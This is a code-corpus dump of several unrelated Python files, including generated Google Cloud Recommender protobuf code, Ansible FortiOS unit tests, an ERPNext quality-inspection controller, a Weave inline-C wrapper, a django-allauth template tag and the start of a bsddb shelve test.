The set of recommendations for the ``parent`` resource.
next_page_token:
A token that can be used to request the next page of results.
This field is empty if there are no additional results.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.ListRecommendationsResponse)
),
)
_sym_db.RegisterMessage(ListRecommendationsResponse)
GetRecommendationRequest = _reflection.GeneratedProtocolMessageType(
"GetRecommendationRequest",
(_message.Message,),
dict(
DESCRIPTOR=_GETRECOMMENDATIONREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request to the ``GetRecommendation`` method.
Attributes:
name:
Name of the recommendation.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.GetRecommendationRequest)
),
)
_sym_db.RegisterMessage(GetRecommendationRequest)
MarkRecommendationClaimedRequest = _reflection.GeneratedProtocolMessageType(
"MarkRecommendationClaimedRequest",
(_message.Message,),
dict(
StateMetadataEntry=_reflection.GeneratedProtocolMessageType(
"StateMetadataEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest.StateMetadataEntry)
),
),
DESCRIPTOR=_MARKRECOMMENDATIONCLAIMEDREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request for the ``MarkRecommendationClaimed`` Method.
Attributes:
name:
Name of the recommendation.
state_metadata:
State properties to include with this state. Overwrites any
existing ``state_metadata``.
etag:
Fingerprint of the Recommendation. Provides optimistic
locking.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationClaimedRequest)
),
)
_sym_db.RegisterMessage(MarkRecommendationClaimedRequest)
_sym_db.RegisterMessage(MarkRecommendationClaimedRequest.StateMetadataEntry)
MarkRecommendationSucceededRequest = _reflection.GeneratedProtocolMessageType(
"MarkRecommendationSucceededRequest",
(_message.Message,),
dict(
StateMetadataEntry=_reflection.GeneratedProtocolMessageType(
"StateMetadataEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest.StateMetadataEntry)
),
),
DESCRIPTOR=_MARKRECOMMENDATIONSUCCEEDEDREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request for the ``MarkRecommendationSucceeded`` Method.
Attributes:
name:
Name of the recommendation.
state_metadata:
State properties to include with this state. Overwrites any
existing ``state_metadata``.
etag:
Fingerprint of the Recommendation. Provides optimistic
locking.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationSucceededRequest)
),
)
_sym_db.RegisterMessage(MarkRecommendationSucceededRequest)
_sym_db.RegisterMessage(MarkRecommendationSucceededRequest.StateMetadataEntry)
MarkRecommendationFailedRequest = _reflection.GeneratedProtocolMessageType(
"MarkRecommendationFailedRequest",
(_message.Message,),
dict(
StateMetadataEntry=_reflection.GeneratedProtocolMessageType(
"StateMetadataEntry",
(_message.Message,),
dict(
DESCRIPTOR=_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2"
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest.StateMetadataEntry)
),
),
DESCRIPTOR=_MARKRECOMMENDATIONFAILEDREQUEST,
__module__="google.cloud.recommender_v1beta1.proto.recommender_service_pb2",
__doc__="""Request for the ``MarkRecommendationFailed`` Method.
Attributes:
name:
Name of the recommendation.
state_metadata:
State properties to include with this state. Overwrites any
existing ``state_metadata``.
etag:
Fingerprint of the Recommendation. Provides optimistic
locking.
""",
# @@protoc_insertion_point(class_scope:google.cloud.recommender.v1beta1.MarkRecommendationFailedRequest)
),
)
_sym_db.RegisterMessage(MarkRecommendationFailedRequest)
_sym_db.RegisterMessage(MarkRecommendationFailedRequest.StateMetadataEntry)
# Drop the raw serialized options now that descriptors are fully built
# (protoc emits this cleanup for the file and each map-entry type).
DESCRIPTOR._options = None
_MARKRECOMMENDATIONCLAIMEDREQUEST_STATEMETADATAENTRY._options = None
_MARKRECOMMENDATIONSUCCEEDEDREQUEST_STATEMETADATAENTRY._options = None
_MARKRECOMMENDATIONFAILEDREQUEST_STATEMETADATAENTRY._options = None
# protoc-generated service descriptor for the Recommender service: five RPCs,
# each with serialized google.api.http annotations (the _b(...) byte strings).
_RECOMMENDER = _descriptor.ServiceDescriptor(
    name="Recommender",
    full_name="google.cloud.recommender.v1beta1.Recommender",
    file=DESCRIPTOR,
    index=0,
    serialized_options=_b(
        "\312A\032recommender.googleapis.com\322A.https://www.googleapis.com/auth/cloud-platform"
    ),
    serialized_start=1223,
    serialized_end=2494,
    methods=[
        _descriptor.MethodDescriptor(
            name="ListRecommendations",
            full_name="google.cloud.recommender.v1beta1.Recommender.ListRecommendations",
            index=0,
            containing_service=None,
            input_type=_LISTRECOMMENDATIONSREQUEST,
            output_type=_LISTRECOMMENDATIONSRESPONSE,
            serialized_options=_b(
                "\202\323\344\223\002I\022G/v1beta1/{parent=projects/*/locations/*/recommenders/*}/recommendations"
            ),
        ),
        _descriptor.MethodDescriptor(
            name="GetRecommendation",
            full_name="google.cloud.recommender.v1beta1.Recommender.GetRecommendation",
            index=1,
            containing_service=None,
            input_type=_GETRECOMMENDATIONREQUEST,
            output_type=google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION,
            serialized_options=_b(
                "\202\323\344\223\002I\022G/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}"
            ),
        ),
        _descriptor.MethodDescriptor(
            name="MarkRecommendationClaimed",
            full_name="google.cloud.recommender.v1beta1.Recommender.MarkRecommendationClaimed",
            index=2,
            containing_service=None,
            input_type=_MARKRECOMMENDATIONCLAIMEDREQUEST,
            output_type=google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION,
            serialized_options=_b(
                '\202\323\344\223\002X"S/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markClaimed:\001*'
            ),
        ),
        _descriptor.MethodDescriptor(
            name="MarkRecommendationSucceeded",
            full_name="google.cloud.recommender.v1beta1.Recommender.MarkRecommendationSucceeded",
            index=3,
            containing_service=None,
            input_type=_MARKRECOMMENDATIONSUCCEEDEDREQUEST,
            output_type=google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION,
            serialized_options=_b(
                '\202\323\344\223\002Z"U/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markSucceeded:\001*'
            ),
        ),
        _descriptor.MethodDescriptor(
            name="MarkRecommendationFailed",
            full_name="google.cloud.recommender.v1beta1.Recommender.MarkRecommendationFailed",
            index=4,
            containing_service=None,
            input_type=_MARKRECOMMENDATIONFAILEDREQUEST,
            output_type=google_dot_cloud_dot_recommender__v1beta1_dot_proto_dot_recommendation__pb2._RECOMMENDATION,
            serialized_options=_b(
                '\202\323\344\223\002W"R/v1beta1/{name=projects/*/locations/*/recommenders/*/recommendations/*}:markFailed:\001*'
            ),
        ),
    ],
)
_sym_db.RegisterServiceDescriptor(_RECOMMENDER)
DESCRIPTOR.services_by_name["Recommender"] = _RECOMMENDER
# @@protoc_insertion_point(module_scope)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_spamfilter_iptrust
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
    """Auto-applied fixture: patch the module's Connection class for every test."""
    return mocker.patch('ansible.modules.network.fortios.fortios_spamfilter_iptrust.Connection')


fos_instance = FortiOSHandler(connection_mock)
def test_spamfilter_iptrust_creation(mocker):
    """A successful create call reports success and a change."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value=set_result)

    payload = {'comment': 'Optional comments.', 'id': '4', 'name': 'default_name_5'}
    input_data = {
        'username': 'admin',
        'state': 'present',
        'spamfilter_iptrust': dict(payload),
        'vdom': 'root',
    }

    is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)

    set_mock.assert_called_with('spamfilter', 'iptrust', data=payload, vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
def test_spamfilter_iptrust_creation_fails(mocker):
    """A failed create call reports an error and no change."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value=set_result)

    payload = {'comment': 'Optional comments.', 'id': '4', 'name': 'default_name_5'}
    input_data = {
        'username': 'admin',
        'state': 'present',
        'spamfilter_iptrust': dict(payload),
        'vdom': 'root',
    }

    is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)

    set_mock.assert_called_with('spamfilter', 'iptrust', data=payload, vdom='root')
    schema_mock.assert_not_called()
    assert is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 500
def test_spamfilter_iptrust_removal(mocker):
    """A successful delete call reports success and a change."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    delete_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
    delete_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete',
        return_value=delete_result)

    input_data = {
        'username': 'admin',
        'state': 'absent',
        'spamfilter_iptrust': {
            'comment': 'Optional comments.',
            'id': '4',
            'name': 'default_name_5',
        },
        'vdom': 'root',
    }

    is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)

    delete_mock.assert_called_with('spamfilter', 'iptrust', mkey=ANY, vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
def test_spamfilter_iptrust_deletion_fails(mocker):
    """A failed delete call reports an error and no change."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    delete_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
    delete_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete',
        return_value=delete_result)

    input_data = {
        'username': 'admin',
        'state': 'absent',
        'spamfilter_iptrust': {
            'comment': 'Optional comments.',
            'id': '4',
            'name': 'default_name_5',
        },
        'vdom': 'root',
    }

    is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)

    delete_mock.assert_called_with('spamfilter', 'iptrust', mkey=ANY, vdom='root')
    schema_mock.assert_not_called()
    assert is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 500
def test_spamfilter_iptrust_idempotent(mocker):
    """A 404 from the API (object already in desired state) is not a change."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value=set_result)

    payload = {'comment': 'Optional comments.', 'id': '4', 'name': 'default_name_5'}
    input_data = {
        'username': 'admin',
        'state': 'present',
        'spamfilter_iptrust': dict(payload),
        'vdom': 'root',
    }

    is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)

    set_mock.assert_called_with('spamfilter', 'iptrust', data=payload, vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 404
def test_spamfilter_iptrust_filter_foreign_attributes(mocker):
    """Attributes not in the module schema are stripped before the API call."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value=set_result)

    payload = {'comment': 'Optional comments.', 'id': '4', 'name': 'default_name_5'}
    input_data = {
        'username': 'admin',
        'state': 'present',
        'spamfilter_iptrust': dict(payload, random_attribute_not_valid='tag'),
        'vdom': 'root',
    }

    is_error, changed, response = fortios_spamfilter_iptrust.fortios_spamfilter(input_data, fos_instance)

    # The foreign attribute must not reach the device API.
    set_mock.assert_called_with('spamfilter', 'iptrust', data=payload, vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
# coding: utf-8
"""
MIT License
Copyright (c) 2019 Claude SIMON (https://q37.info/s/rmnmqd49)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import workshop._.K as workshop
from workshop.en._ import *
def go(globals):
    """Start the exercise: hand workshop.main a factory that wraps each dom in a Core."""
    def build_core(dom):
        return workshop.Core(dom)
    workshop.main(build_core, globals, USER_ITEM_LABELS)
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import webnotes
from webnotes.model.doc import addchild
class DocType:
	"""Server-side controller for the Quality Inspection doctype.

	Loads the inspection-parameter template from the Item master, and keeps
	the ``qa_no`` back-reference on the linked Purchase Receipt item row in
	sync when the inspection is submitted or cancelled.
	"""
	def __init__(self, doc, doclist=None):
		self.doc = doc
		# Fresh list per instance; the previous `doclist=[]` default was a
		# shared mutable default argument.
		self.doclist = doclist if doclist is not None else []

	def get_item_specification_details(self):
		"""Rebuild the qa_specification_details child table from the Item's
		Quality Inspection Parameter template, defaulting each row to 'Accepted'."""
		self.doclist = self.doc.clear_table(self.doclist, 'qa_specification_details')
		# Parameterized query: item_code originates from user input.
		specification = webnotes.conn.sql("""select specification, value
			from `tabItem Quality Inspection Parameter`
			where parent = %s order by idx""", self.doc.item_code)
		for spec_name, spec_value in specification:
			child = addchild(self.doc, 'qa_specification_details',
				'Quality Inspection Reading', self.doclist)
			child.specification = spec_name
			child.value = spec_value
			child.status = 'Accepted'

	def on_submit(self):
		"""Stamp this inspection's name onto the matching Purchase Receipt item."""
		self._set_qa_no_on_purchase_receipt(self.doc.name)

	def on_cancel(self):
		"""Clear the inspection reference from the matching Purchase Receipt item."""
		self._set_qa_no_on_purchase_receipt('')

	def _set_qa_no_on_purchase_receipt(self, qa_no):
		"""Update qa_no on the linked Purchase Receipt item row, touching the
		parent's modified timestamp. Parameterized to avoid SQL injection."""
		if self.doc.purchase_receipt_no:
			webnotes.conn.sql("""update `tabPurchase Receipt Item` t1, `tabPurchase Receipt` t2
				set t1.qa_no = %s, t2.modified = %s
				where t1.parent = %s and t1.item_code = %s and t1.parent = t2.name""",
				(qa_no, self.doc.modified, self.doc.purchase_receipt_no, self.doc.item_code))
def item_query(doctype, txt, searchfield, start, page_len, filters):
	"""Link-field search: item codes belonging to a parent document, matching `txt`.

	Returns None when filters carries no "from" key (unchanged behaviour).
	`parent` and `txt` are user-supplied, so they are passed as query
	parameters; `start`/`page_len` are coerced to int (MySQL rejects quoted
	LIMIT operands, so they cannot be bound parameters). The old code pasted
	all of them straight into the SQL string and was injectable via `txt`.
	`from` (a doctype/table name) and the framework-built match condition
	are still interpolated, since identifiers cannot be parameterized.
	"""
	if filters.get("from"):
		from webnotes.widgets.reportview import get_match_cond
		# Escape literal % so the driver's parameter-substitution pass keeps them.
		mcond = get_match_cond(filters["from"], searchfield).replace("%", "%%")
		query = ("""select item_code from `tab%(from)s`
			where parent = %%s and docstatus < 2 and item_code like %%s %(mcond)s
			order by item_code limit %(start)d, %(page_len)d""" % {
				"from": filters["from"],
				"mcond": mcond,
				"start": int(start),
				"page_len": int(page_len),
			})
		return webnotes.conn.sql(query, (filters["parent"], "%%%s%%" % txt))
"""
Interface class for inline C/C++ functions. Based on the SciPy Weave package.
Weave (from SciPy) allows programmers to implement Python methods or
functions using C code written as a string in the Python file. This
is generally done to speed up code that would be slow if written
directly in Python. Because not all users can be assumed to have a
working C/C++ compiler, it is crucial for such optimizations to be
optional. This file provides an interface for processing the inline
C/C++ code in a way that can gracefully revert back to the
unoptimized version when Weave is not available.
The fallback is implemented by making use of the way Python allows
function names to be overwritten, as in these simple examples:
def x(y = 5): return y
def x2(y = 6): return y*y
print 'x:', x(), 'x2:', x2() # Result -- x: 5 x2: 36
x = x2
print 'x:', x(), 'x2:', x2() # Result -- x: 36 x2: 36
In this file, inline() is overwritten to call inline_weave() if Weave
is available. If Weave is not available, inline() will raise a
NotImplementedError exception. For a program to be usable without
Weave, just test inlinec.optimized after defining each optimized
component, replacing it with a non-optimized equivalent if
inlinec.optimized is False.
For more information on weave, see:
http://old.scipy.org/documentation/weave/weaveusersguide.html
Some of the C functions also support OpenMP, which allows them to use
multiple threads automatically on multi-core machines to give better
performance. To enable OpenMP support for those functions, set
openmp=True in the main namespace before importing this file, and
(optionally) set openmp_threads to the number of threads desired. If
openmp_threads is not set, then a thread will be allocated for each
available core by default.
Note that in order to use OpenMP, the C functions are obliged to use the
thread-safe portions of the Python/Numpy C API. In general, the Python
C API cannot be assumed to be thread safe. Calls to PyObject_SetAttrString
are a common hazard which can often be avoided using LOOKUP_FROM_SLOT_OFFSET.
This makes use of Python's __slots__ mechanism with the added benefit of
bypassing the GIL.
$Id$
"""
import collections
import os
from copy import copy
# If import_weave is not defined, or is set to True, will attempt to
# import weave. Set import_weave to False if you want to avoid weave
# altogether, e.g. if your installation is broken.
import __main__
import_weave = __main__.__dict__.get('import_weave',True)

# Dictionary of strings used to allow optional substitutions
# (e.g. pragmas) into inline C code.
#
# CB: default value is empty string for convenience of not
# having to do e.g.
#   if openmp:
#       c_decorators['xyz']='abc'
#   else:
#       c_decorators['xyz']=''
c_decorators = collections.defaultdict(lambda:'')

# Setting to true will cause OpenMP to be used while compiling some C
# code (search for cfs_loop_pragma to see which routines use
# OpenMP). Good multi-threaded performance requires a machine with
# separate memory subsystems for each core, such as a Xeon. See Marco
# Elver's report at http://homepages.inf.ed.ac.uk/s0787712/stuff/melver_project-report.pdf.
# NOTE(review): the default here is False, but the guard further below
# is "openmp_threads != 1", which is True for False/0 -- confirm this
# matches the module docstring's claim that OpenMP is opt-in.
openmp_threads = __main__.__dict__.get('openmp_threads',False)

# Variable that will be used to report whether weave was successfully
# imported (below).
weave_imported = False

# Variable that will be used to report whether simple compilation test
# was successful.
compiled = False
def inline(*params, **nparams):
    """Fallback stub for inline C compilation.

    Always raises NotImplementedError; if Weave imports successfully
    further below, this name is rebound to inline_weave().  Callers
    should consult the module-level `optimized` flag rather than
    relying on catching this exception.
    """
    raise NotImplementedError
##########
# Windows: hack to allow weave to work when a user name contains a
# space (see
# http://thread.gmane.org/gmane.comp.python.scientific.devel/14275)
#
# weave caches its catalog under a path derived from the user name; a
# space in that path breaks compilation.  We temporarily strip spaces
# from USERNAME, force weave's catalog to capture the stripped name,
# then restore the environment.  Any failure is deliberately ignored
# (best-effort: the later weave import/compile test handles fallback).
if import_weave:
    import sys
    if sys.platform.startswith("win"):
        try:
            # catch the initial use of USERNAME by weave
            original_user = os.environ.get("USERNAME")
            os.environ["USERNAME"]=original_user.replace(" ","")
            # now dynamically patch weave and restore USERNAME
            import scipy.weave.catalog
            iam = scipy.weave.catalog.whoami().replace(" ","")
            scipy.weave.catalog.whoami = lambda: iam
            os.environ["USERNAME"]=original_user
        except:
            pass
##########
try:
    if import_weave:
        # We supply weave separately with the source distribution, but
        # e.g. the ubuntu package uses scipy.
        try:
            import weave
        except ImportError:
            from scipy import weave # pyflakes:ignore (try/except import)
        weave_imported = True

        # Default parameters to add to the inline_weave() call.
        inline_named_params = {
            'extra_compile_args':['-O2','-Wno-unused-variable -fomit-frame-pointer','-funroll-loops'],
            'extra_link_args':['-lstdc++'],
            'compiler':'gcc',
            'verbose':0}

        # NOTE(review): openmp_threads defaults to False above, and
        # False != 1, so this branch is taken by default -- confirm
        # whether OpenMP flags are meant to be on unless exactly one
        # thread is requested.
        if openmp_threads != 1:
            c_decorators['cfs_loop_pragma']="#pragma omp parallel for schedule(guided, 8)"
            inline_named_params['extra_compile_args'].append('-fopenmp')
            inline_named_params['extra_link_args'].append('-fopenmp')

        def inline_weave(*params,**nparams):
            # Merge per-call keyword args over the module defaults and
            # delegate to weave's real inline compiler.
            named_params = copy(inline_named_params) # Make copy of defaults.
            named_params.update(nparams) # Add newly passed named parameters.
            weave.inline(*params,**named_params)

        # Overwrites stub definition with full Weave definition
        inline = inline_weave
except ImportError:
    # CEBALERT: where does 'caution' fit in our warnings system? (Also
    # used in other places in this file.)
    print 'Caution: Unable to import Weave. Will use non-optimized versions of most components.'
# If weave imported, verify that it can actually compile by building a
# trivial C snippet; on failure `compiled` stays False so callers fall
# back to the pure-Python implementations.
if weave_imported:
    import random
    try:
        # to force recompilation each time
        inline('double x=%s;'%random.random())
        compiled = True
    except Exception, e:
        print "Caution: Unable to use Weave to compile: \"%s\". Will use non-optimized versions of most components."%str(e)

# Flag available for all to use to test whether to use the inline
# versions or not.
optimized = weave_imported and compiled

# When True, each call to provide_unoptimized_equivalent() prints its
# own warning; when False a single summary note is printed below.
warn_for_each_unoptimized_component = False
# JABALERT: I can't see any reason why this function accepts names rather
# than the more pythonic option of accepting objects, from which names
# can be extracted if necessary.
def provide_unoptimized_equivalent(optimized_name, unoptimized_name, local_dict):
    """
    If not using optimization, replace the optimized component with its unoptimized equivalent.

    The objects named by optimized_name and unoptimized_name should be
    plug-compatible.  The local_dict argument should be given the
    contents of locals(), so that this function can replace the
    optimized version with the unoptimized one in the namespace from
    which it has been called.

    As an example, calling this function as::

      provide_unoptimized_equivalent("sort_opt","sort",locals())

    is equivalent to putting the following code directly into the
    calling location::

      if not optimized:
          sort_opt = sort
          print 'module: Inline-optimized components not available; using sort instead of sort_opt.'
    """
    if not optimized:
        # Rebind the optimized name in the *caller's* namespace.
        local_dict[optimized_name] = local_dict[unoptimized_name]
        if warn_for_each_unoptimized_component:
            print '%s: Inline-optimized components not available; using %s instead of %s.' \
                  % (local_dict['__name__'], optimized_name, unoptimized_name)

# Single summary notice instead of one warning per replaced component.
if not optimized and not warn_for_each_unoptimized_component:
    print "Note: Inline-optimized components are currently disabled; see topo.misc.inlinec"
# Definitions useful for working with optimized Python code;
# prepend to the code for an inlinec call if you want to use them.
c_header = """
/* Declaration for interfacing to numpy floats */
typedef double npfloat;
/* For a given class cls and an attribute attr, defines a variable
attr_offset containing the offset of that attribute in the class's
__slots__ data structure. */
#define DECLARE_SLOT_OFFSET(attr,cls) \
PyMemberDescrObject *attr ## _descr = (PyMemberDescrObject *)PyObject_GetAttrString(cls,#attr); \
Py_ssize_t attr ## _offset = attr ## _descr->d_member->offset; \
Py_DECREF(attr ## _descr)
/* After a previous declaration of DECLARE_SLOT_OFFSET, for an
instance obj of that class and the given attr, retrieves the value
of that attribute from its slot. */
#define LOOKUP_FROM_SLOT_OFFSET(type,attr,obj) \
PyArrayObject *attr ## _obj = *((PyArrayObject **)((char *)obj + attr ## _offset)); \
type *attr = (type *)(attr ## _obj->data)
/* LOOKUP_FROM_SLOT_OFFSET without declaring data variable */
#define LOOKUP_FROM_SLOT_OFFSET_UNDECL_DATA(type,attr,obj) \
PyArrayObject *attr ## _obj = *((PyArrayObject **)((char *)obj + attr ## _offset));
/* Same as LOOKUP_FROM_SLOT_OFFSET but ensures the array is contiguous.
Must call DECREF_CONTIGUOUS_ARRAY(attr) to release temporary.
Does PyArray_FLOAT need to be an argument for this to work with doubles? */
// This code is optimized for contiguous arrays, which are typical,
// but we make it work for noncontiguous arrays (e.g. views) by
// creating a contiguous copy if necessary.
//
// CEBALERT: I think there are better alternatives
// e.g. PyArray_GETCONTIGUOUS (PyArrayObject*) (PyObject* op)
// (p248 of numpybook), which only acts if necessary...
// Do we have a case where we know this code is being
// called, so that I can test it easily?
// CEBALERT: weights_obj appears below. Doesn't that mean this thing
// will only work when attr is weights?
#define CONTIGUOUS_ARRAY_FROM_SLOT_OFFSET(type,attr,obj) \
PyArrayObject *attr ## _obj = *((PyArrayObject **)((char *)obj + attr ## _offset)); \
type *attr = 0; \
PyArrayObject * attr ## _array = 0; \
if(PyArray_ISCONTIGUOUS(weights_obj)) \
attr = (type *)(attr ## _obj->data); \
else { \
attr ## _array = (PyArrayObject*) PyArray_ContiguousFromObject((PyObject*)attr ## _obj,PyArray_FLOAT,2,2); \
attr = (type *) attr ## _array->data; \
}
#define DECREF_CONTIGUOUS_ARRAY(attr) \
if(attr ## _array != 0) { \
Py_DECREF(attr ## _array); }
#define UNPACK_FOUR_TUPLE(type,i1,i2,i3,i4,tuple) \
type i1 = *tuple++; \
type i2 = *tuple++; \
type i3 = *tuple++; \
type i4 = *tuple
"""
# Simple test: running this module directly compiles and executes a
# trivial printf via whichever inline() implementation is active
# (raises NotImplementedError when Weave is unavailable).
if __name__ == '__main__':
    inline('printf("Hello World!!\\n");')
| bsd-3-clause |
agriffis/django-allauth | allauth/account/templatetags/account.py | 43 | 1159 | from django import template
from allauth.account.utils import user_display
register = template.Library()
class UserDisplayNode(template.Node):
    """Template node that renders ``user_display(user)``.

    With ``as_var`` set, the display name is stored under that context
    variable and nothing is rendered; otherwise the name itself is the
    rendered output.
    """

    def __init__(self, user, as_var=None):
        self.user_var = template.Variable(user)
        self.as_var = as_var

    def render(self, context):
        resolved_user = self.user_var.resolve(context)
        name = user_display(resolved_user)
        if not self.as_var:
            return name
        context[self.as_var] = name
        return ""
@register.tag(name="user_display")
def do_user_display(parser, token):
    """
    Render (or capture) a user's display name.

    Example usage::

        {% user_display user %}

    or if you need to use in a {% blocktrans %}::

        {% user_display user as user_display %}
        {% blocktrans %}{{ user_display }} has sent you a gift.{% endblocktrans %}
    """
    bits = token.split_contents()
    argc = len(bits)
    if argc not in (2, 4):
        raise template.TemplateSyntaxError(
            "'%s' takes either two or four arguments" % bits[0])
    target_var = bits[3] if argc == 4 else None
    return UserDisplayNode(bits[1], target_var)
| mit |
Lh4cKg/sl4a | python/src/Lib/bsddb/test/test_dbshelve.py | 33 | 11290 | """
TestCases for checking dbShelve objects.
"""
import os, string
import random
import unittest
from test_all import db, dbshelve, test_support, verbose, \
get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
# We want the objects to be comparable so we can test dbshelve.values
# later on.
class DataClass:
    """Holder for a random float, comparable/representable for the tests.

    dbshelve.values() results are compared later in the suite, so
    instances must order consistently: Python 2 uses __cmp__, while the
    Python 3 path sorts on repr() strings instead.
    """

    def __init__(self):
        self.value = random.random()

    def __repr__(self):  # Python 3.0 path sorts on this string
        return "DataClass {0:f}".format(self.value)

    def __cmp__(self, other):  # Python 2.x comparison
        # Note: compares self.value against `other` directly, not
        # against other.value (matches how the suite uses it).
        return cmp(self.value, other)
class DBShelveTestCase(unittest.TestCase):
    """Base tests for dbshelve: basic mapping ops, cursors and append().

    Subclasses override do_open()/do_close() (and mk()/checkrec() for
    RECNO) to exercise the same behaviour against different DB types.
    """

    def setUp(self):
        # On Python 3 the test_all proxy is disabled for the duration of
        # the test and restored in tearDown.
        import sys
        if sys.version_info[0] >= 3 :
            from test_all import do_proxy_db_py3k
            self._flag_proxy_db_py3k = do_proxy_db_py3k(False)
        self.filename = get_new_database_path()
        self.do_open()

    def tearDown(self):
        import sys
        if sys.version_info[0] >= 3 :
            from test_all import do_proxy_db_py3k
            do_proxy_db_py3k(self._flag_proxy_db_py3k)
        self.do_close()
        test_support.unlink(self.filename)

    def mk(self, key):
        """Turn key into an appropriate key type for this db"""
        # override in child class for RECNO
        import sys
        if sys.version_info[0] < 3 :
            return key
        else :
